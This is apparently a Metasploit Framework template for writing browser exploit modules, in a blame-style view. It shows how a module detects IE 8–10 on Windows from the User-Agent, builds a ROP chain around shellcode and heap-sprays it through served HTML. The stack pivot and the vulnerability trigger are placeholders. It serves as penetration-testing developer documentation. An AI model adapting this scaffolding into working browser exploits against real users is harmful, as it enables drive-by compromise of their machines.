2013-07-08 17:10:15 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# This exploit sample demonstrates how a typical browser exploit is written using commonly
|
|
|
|
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
|
|
|
|
#
|
|
|
|
###
|
|
|
|
class Metasploit4 < Msf::Exploit::Remote
|
2013-09-30 18:47:53 +00:00
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
include Msf::Exploit::RopDb
|
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
|
|
|
|
# Set :classid and :method for ActiveX exploits. For example:
|
|
|
|
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
|
|
|
# :method => "SetShapeNodeType",
|
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::IE,
|
|
|
|
:ua_minver => "8.0",
|
|
|
|
:ua_maxver => "10.0",
|
|
|
|
:javascript => true,
|
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
|
|
:rank => NormalRanking
|
|
|
|
})
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Module Name",
|
|
|
|
'Description' => %q{
|
|
|
|
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
|
|
|
|
the browser version. Please note IE8 and newer may emulate an older IE version
|
|
|
|
in compatibility mode, in that case the module won't be able to detect the
|
|
|
|
browser correctly.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'sinn3r' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://metasploit.com' ]
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', {} ],
|
|
|
|
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
|
|
|
|
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
|
|
|
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
|
|
|
|
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
|
|
|
|
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00", # js_property_spray
|
|
|
|
'StackAdjustment' => -3500
|
|
|
|
},
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Apr 1 2013",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_target(agent)
|
|
|
|
return target if target.name != 'Automatic'
|
|
|
|
|
|
|
|
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
|
|
|
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
|
|
|
|
|
|
|
ie_name = "IE #{ie}"
|
|
|
|
|
|
|
|
case nt
|
|
|
|
when '5.1'
|
|
|
|
os_name = 'Windows XP SP3'
|
|
|
|
when '6.0'
|
|
|
|
os_name = 'Windows Vista'
|
|
|
|
when '6.1'
|
|
|
|
os_name = 'Windows 7'
|
|
|
|
when '6.2'
|
|
|
|
os_name = 'Windows 8'
|
|
|
|
end
|
|
|
|
|
|
|
|
targets.each do |t|
|
|
|
|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
|
|
|
return t
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
nil
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_payload(t)
|
|
|
|
stack_pivot = "\x41\x42\x43\x44"
|
|
|
|
code = payload.encoded
|
|
|
|
|
|
|
|
case t['Rop']
|
|
|
|
when :msvcrt
|
|
|
|
print_status("Using msvcrt ROP")
|
|
|
|
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
|
|
|
|
|
|
|
else
|
|
|
|
print_status("Using JRE ROP")
|
|
|
|
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
|
|
|
end
|
|
|
|
|
|
|
|
rop_payload
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def get_html(t)
|
|
|
|
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
|
|
|
|
html = %Q|
|
|
|
|
<script>
|
|
|
|
#{js_property_spray}
|
|
|
|
|
|
|
|
var s = unescape("#{js_p}");
|
|
|
|
sprayHeap({shellcode:s});
|
|
|
|
</script>
|
|
|
|
|
|
|
|
|
|
|
|
|
html.gsub(/^\t\t/, '')
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
agent = request.headers['User-Agent']
|
|
|
|
print_status("Requesting: #{request.uri}")
|
|
|
|
|
|
|
|
target = get_target(agent)
|
|
|
|
if target.nil?
|
|
|
|
print_error("Browser not supported, sending 404: #{agent}")
|
|
|
|
send_not_found(cli)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Target selected as: #{target.name}")
|
|
|
|
html = get_html(target)
|
|
|
|
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
|
|
|
|
end
|
2013-07-08 17:10:15 +00:00
|
|
|
end
|